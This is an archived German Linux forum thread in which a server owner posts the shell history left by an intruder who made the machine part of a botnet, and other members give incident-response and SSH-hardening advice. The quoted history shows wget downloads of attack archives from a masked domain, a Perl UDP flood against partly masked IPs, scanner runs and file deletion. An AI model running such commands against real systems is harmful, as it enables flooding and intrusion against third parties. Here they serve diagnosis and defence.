PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : root Server im BotNetzwerk - Perl Sicherheitslücke??



gerry_coop
24.02.11, 01:11
Hallo und Guten Abend oder eher Guten Morgen,

ich habe einen root Server im Netzwerk der gerade (jetzt nicht mehr) in ein BotNetzwerk gewandert ist.

Ist euch irgendwas bekannt das in Perl eine Sicherheitslücke besteht? Denn irgenjemand hat gerade mein Server bedingt übernommen :mad:

Anbei die Befehle die als root benutzer ausgeführt wurden und somit eine FloodAtacke auf div. IP Adressen auslösen konnte.

************************ SNIP ************************
[WebSite_des_Angrifs_wurde_auskommentiert/udp.tgz
178 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
179 tar xzvf udp.tgz
180 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
181 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
182 wget xxxxxx.ro/a/x.tgz - domain aus Rumänien (Dateien haben Rumänische kommentare)
183 tar xzvf x.tgz
184 cd pma
185 rm -rf bios.txt
186 ./ss 25 -a 194 -i eth0 -s 10
187 wget xxxxxxx.ro/a/e.tgz
188 tar xzvf e.tgz
189 cd sc
190 nano x.pl
191 ./sc 217.160
192 ./sc 87.106
193 ./sc 66.252
194 ./sc 173.203
195 w
196 id
197 ./sc 213.160
198 w
199 ls
200 rm -rf new
201 rm -rf vuln.txt
202 ./sc 85.237
203 id
204 w
205 w
206 id
207 perl x.pl WH1981
208 perl x.pl xxxx.hu - Domain gelöscht
209 perl x.pl xxxx.com - Domain gelöscht
210 w
************************ SNAP ************************

da sind noch mehr Befehle die eingegeben wurden jedoch ist das der einstieg der Attacke.

Ich habe jetzt natürlich bammel damit Online zu gehen - zur Zeit läuft nur FTP und SSH aber irgenwann sollte wieder HTTP laufen.

Falls jemand was weiss währe ich für eine Info Dankbar. :)

Schöne Grüsse
Gerry

marce
24.02.11, 07:12
damit ein Server übernommen werden kann muss von extern etwas enigeschleust werden - da Perl von sich aus nicht an externen Ports lauscht - kann Perl nicht die primäre Ursache sein.

Sprich - Du hast irgendwo anders eine Lücke im System.

-> das System ist nicht mehr vertrauenswürdig. Mach eine komplett-Sicherung zur Analyse und setze die Kiste komplett neu auf. Dann absichern, Dienste installieren, absichern, vertrauenswürdige Daten einspielen (am besten ohne die wohl irgendwo bestehende Lücke) und danach System sauber pflegen.

gerry_coop
24.02.11, 09:33
Hallo marce,

hmmm - ok Danke für die Info. Habe mich schon innerlich und softwareseitig darauf vorbereitet :(

Was jedoch kommisch ist apache2 ist uptodate system uptodate exim, proftp und sshd genauso - deswegen kann ich mir den einbruch nicht wirklich erklären.

Schöne Grüsse
Gerry

PS: Grüsse in die Nachbarschaft ;) - das inet ist doch eine kleine Scheibe

marce
24.02.11, 09:36
naja, Apache up2date ist ja schön und gut, wenn aber z.B. ein phpBB 2.0 oder ein phpMyAdmin-2x darauf läuft - oder "eigene" Scripte von "professionellen" Programmierern und dann das ganze System nicht optimal konfiguriert ist - bringt Dir das rein gar nichts...

Einbruchsfenster finden sich meist in Dritt-Software, nicht in dem, was die Distribution mitgegeben hat (so die aktuell und ordentlich gepflegt ist)...

Wene
24.02.11, 12:22
Wie ist Dein SSHd konfiguriert? Kannst Du (und der Angreifer) Dich direkt als root anmelden? Und das womöglich noch mit Passwort statt mit Key? Und lässt sich das Passwort aus Wörtern im Wörterbuch zusammensetzen?

gerry_coop
26.02.11, 13:51
Hallole,

SSHD ist nur mit login auth. gesichert da ein paar Leute SSH zugriff bekommen.
Passwd ist mit ZahlenGROSSklein und 12 Zeichen lang.

Ich habe heute das Teil sicherheitshalber neu installiert - debian Lenny - Squeeze wird leider nicht angeboten :confused:

Schönen Dank für die Hilfe
Grüsse und schönes WE
Gerry

Wene
26.02.11, 21:37
SSHD ist nur mit login auth. gesichert da ein paar Leute SSH zugriff bekommen.

Zum einen muss root dafür keinen Zugriff haben. Ist dieser Login gesperrt?

Zum anderen ist es auch möglich die Keys von "ein paar Leuten" einzutragen so dass die Gefahr eines erratenen Passwortes weiter verkleinert wird.

nopes
27.02.11, 01:50
Ich habe heute das Teil sicherheitshalber neu installiert - debian Lenny - Squeeze wird leider nicht angeboten
Es bietet sich bei dieser Gelegenheit auch an, das FS zu überwachen, AIDE kann so was z.B. http://www.linuxsecurity.com/content/view/117263/50/, und http://www.debian.org/doc/manuals/securing-debian-howto/index.de.html#contents kann auch nicht schaden...